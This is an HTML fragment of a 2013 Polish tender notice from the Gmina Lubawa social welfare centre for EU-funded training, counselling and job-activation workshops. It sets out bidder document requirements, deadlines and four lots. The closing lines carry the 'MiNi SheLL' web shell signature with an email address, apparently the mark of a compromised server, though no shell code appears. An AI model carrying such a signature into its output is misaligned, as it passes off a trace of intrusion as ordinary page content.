Ocena spełniania w/w warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych Specyfikacji Istotnych Warunków Zamówienia (SIWZ). Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww warunki Wykonawca spełnił. 
Uzupełnienie wymaganych dokumentów jest możliwe po upływie terminu składania ofert,  tylko i wyłącznie na podstawie art. 26 ust. 3 ustawy Pzp. 
Nie spełnienie chociażby jednego z ww warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca zobowiązany jest złożyć wraz z odpowiednio wypełnionym i podpisanym FORMULARZEM OFERTOWYM, stanowiącym Załącznik nr 1 do SIWZ : 
Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Pzp. - wzór oświadczenia - Załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia (SIWZ). oraz nie podleganiu wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp. - wzór oświadczenia - Załącznik nr 3 do Specyfikacji Istotnych Warunków Zamówienia (SIWZ).  
Następujące oświadczenia i dokumenty: 
 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust.1 pkt.2 ustawy.
Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie (np. pozytywne referencje od Zamawiających). 
Wymagane jest przeprowadzenie co najmniej 2 usług (warsztatów, treningów, poradnictwa, doradztwa)  o tematyce i zakresie porównywalnym z przedmiotem usługi w ramach poszczególnych części przedmiotu zamówienia. Wykaz usług wykonanych należy przedstawić na druku stanowiącym Załącznik nr 4  do Specyfikacji Istotnych Warunków Zamówienia (SIWZ). 
Wykaz osób - potwierdzający, że Wykonawca dysponuje lub będzie dysponował osobami posiadającymi odpowiednie wykształcenie, doświadczenie niezbędne do realizacji szkoleń w ramach usług będących przedmiotem zamówienia (wymagane jest aby wykładowcy trenerzy biorący udział w realizacji poszczególnych części przedmiotu zamówienia  posiadali  wykształcenie wyższe o kierunku zgodnym z tematyką prowadzonych warsztatów, treningów, porad lub wykształcenie wyższe i specjalizację lub inne  uprawniające do prowadzenia w/w warsztatów, treningów,  porad oraz doświadczenie zawodowe - przeprowadzili co najmniej 2 usługi (treningi, warsztaty, poradnictwo, doradztwo)  odpowiadające swoim rodzajem usługom stanowiącym zakres poszczególnych części przedmiotu zamówienia. 
Wykaz osób należy przedstawić na druku stanowiącym Załącznik nr 5 do Specyfikacji Istotnych Warunków Zamówienia (SIWZ) wraz z kserokopią dyplomów lub innych dokumentów, poświadczających posiadanie przez osoby prowadzące warsztaty, treningi, poradnictwo, doradztwo  ww wykształcenia i doświadczenia.
W przypadku zlecania części zamówienia podwykonawcom - oświadczenie w sprawie realizacji zamówienia przy współudziale podwykonawców stanowiące Załącznik nr 6 do Specyfikacji Istotnych Warunków Zamówienia (SIWZ). 
Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające,   że wykonawca nie zalega z opłacaniem podatków, lub, że uzyskał przewidziane prawem odroczenie lub rozłożenie na raty zaległych płatności lub o wstrzymaniu  w całości wykonania decyzji organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub  potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub o wstrzymaniu w całości wykonania decyzji organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W przypadku zlecania części zamówienia podwykonawcom - oświadczenie w sprawie realizacji zamówienia przy współudziale podwykonawców stanowiące Załącznik nr 6 do SIWZ. 
Wyżej wymienione dokumenty mogą być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.

Do oferty należy dołączyć również Ramowy Program usługi - szkolenia - zgodnie z formularzem stanowiącym Załącznik nr 7  do Specyfikacji Istotnych Warunków Zamówienia (SIWZ) - dotyczy wszystkich zajęć w ramach poszczególnych części zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gopslubawa.4bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej Gminy Lubawa
Fijewo 73
14 - 260 Lubawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2013 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej Gminy Lubawa
Fijewo 73
14 - 260 Lubawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy  pn. Aktywna rodzina realizowany w 2013r. współfinansowany ze środków Unii  Europejskiej w ramach  Europejskiego Funduszu Społecznego  w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji  społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego  Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa edukacyjna i szkoleniowa w dziedzinie rozwoju osobistego:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trening interpersonalny (grupowy) - dla uczestniczek projektu  z Grupy I (10 osób) biorących udział  w ramach Kontraktów Socjalnych
Trening interpersonalny - grupowy - dla uczestniczek i uczestników projektu  z Grupy II (9 osób) biorących udział  w ramach Kontraktów Socjalnych
Poradnictwo psychologiczne (indywidualne) - dla uczestniczek projektu  z Grupy I (10 osób) biorących udział  w ramach Kontraktów Socjalnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-0, 80.57.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa edukacyjna i szkoleniowa w dziedzinie rozwoju osobistego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trening kompetencji rodzicielskich (grupowy) -  dla uczestników i uczestniczek z Grupy I (10 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych:
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce);
Okres realizacji: MAJ  - LIPIEC 2013r.;
Warsztaty zarządzania budżetem domowym (grupowe) - dla uczestników i uczestniczek projektu z Grupy I (10 osób) biorących udział  w ramach Kontraktów Socjalnych:
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce);
Okres realizacji: LIPIEC - WRZESIEŃ 2013r.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-0, 80.57.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa edukacyjna i szkoleniowa w dziedzinie rozwoju osobistego:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty aktywizacji zawodowej (grupowe) - dla uczestników i uczestniczek z Grupy I (10 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych:
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce);
Okres realizacji: WRZESIEŃ  - LISTOPAD 2013r.;
Warsztaty aktywizacji zawodowej (grupowe) - dla uczestników i uczestniczek z Grupy II   (9 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych:
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce);
Okres realizacji: WRZESIEŃ  - LISTOPAD 2013r.;
Doradztwo zawodowe (indywidualne) - dla uczestników i uczestniczek z Grupy II      (9 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych;
Ilość godz. - 36 godz. grupa, a 4 godz. osoba (4 godz. m-nie w miesiącach: MARZEC - LISTOPAD 2013r.);
Okres realizacji: MARZEC - LISTOPAD 2013r.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-0, 80.57.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługa edukacyja i szkoleniowa w dziedzinie rozwoju osobistego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warsztaty autoprezentacji (grupowe) - dla uczestników i uczestniczek z Grupy II (9 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych:
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce);
bOkres realizacji: CZERWIEC - SIERPIEŃ 2013r.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-0, 80.57.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com